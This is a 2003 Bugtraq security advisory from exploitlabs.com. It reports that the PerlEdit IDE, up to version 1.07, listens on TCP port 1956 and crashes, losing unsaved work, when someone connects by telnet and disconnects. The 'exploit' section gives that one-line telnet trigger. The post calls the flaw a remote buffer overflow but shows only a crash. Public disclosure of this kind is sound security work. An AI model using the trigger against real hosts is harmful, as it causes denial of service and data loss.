[30494] in bugtraq
PerlEdit
daemon@ATHENA.MIT.EDU (morning_wood)
Mon Jun 23 16:26:31 2003
From: "morning_wood" <se_cur_ity@hotmail.com>
To: "0day" <0day@nothackers.org>, <support@indigostar.com>
Date: Sat, 21 Jun 2003 01:47:20 -0700
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-ID: <Law11-OE29b1ZGI8tvG0004d19e@hotmail.com>
------------------------------------------------------------------
- EXPL-A-2003-010 exploitlabs.com Advisory 010
------------------------------------------------------------------
-= PerlEdit =-
exploitlabs.com
June 21, 2003
Vunerability:
-------------
Remote Buffer Overflow
Product:
--------
PerlEdit
http://www.indigostar.com/perledit.html
All versions to current ( 1.07 )
Description of product:
-----------------------
"PerlEdit is an IDE for Perl and a general-purpose text editor.
It includes a source code text editor with syntax highlighting
and a visual debugger."
screenshot: http://www.indigostar.com/perledit_screenshots.html
VUNERABILITY / EXPLOIT
======================
Upon execution perledit binds to local TCP port 1956.
By connecting via Telnet localy or remotely causes the program
to crash, resulting in a total loss of unsaved data.
------------- 'sploit -------------------------
telnet host-running-perledit 1956
READY
( exit telnet ) remote perledit crashes.
Further investigation may lead to more serious issues, I did not
persue as this was bad enough.
Local:
------
yes
Remote:
-------
yes
Vendor Fix:
-----------
No fix on 0day
Vendor Contact:
---------------
support@indigostar.com - Concurrent with this advisory
Credits:
--------
Donnie Werner
http://exploitlabs.com
http://nothackers.org - Freedom of Voice - Freedom of Choice
